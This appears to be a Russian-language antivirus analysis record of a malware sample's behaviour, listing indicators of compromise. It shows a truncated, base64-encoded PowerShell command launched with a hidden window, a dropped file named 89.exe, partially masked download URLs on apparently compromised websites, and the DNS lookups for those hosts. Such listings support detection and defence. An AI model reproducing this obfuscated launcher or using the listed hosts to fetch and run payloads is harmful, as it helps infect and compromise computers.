Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFgAVgBSAFEAeQBuAHAAPQAnAE0ATgBSAFMATwBwAG4AYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGkAdABgAFkAUAByAE8AVABvAGMAYABvAGwAIgAgAD...
- %HOMEPATH%\89.exe
- %HOMEPATH%\89.exe
- http://tv###miguel.com/ww4w/y_mm_n8/
- http://dg###tkelis.lt/ww12/gmei_ksa_vb/
- http://te##lh.com/old_whmcs/jd_elc_1e/
- http://te###engel.com/wp-admin/gg_p_njyjdpr/
- http://te###engel.com/cgi-sys/suspendedpage.cgi
- http://te###sign.com/stats/szv5_kv_vaf4016v/
- DNS ASK tv###miguel.com
- DNS ASK dg###tkelis.lt
- DNS ASK te##lh.com
- DNS ASK te###engel.com
- DNS ASK te###sign.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAFgAVgBSAFEAeQBuAHAAPQAnAE0ATgBSAFMATwBwAG4AYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQByAGkAdABgAFkAUAByAE8AVABvAGMAYABvAGwAIgAgAD...' (со скрытым окном)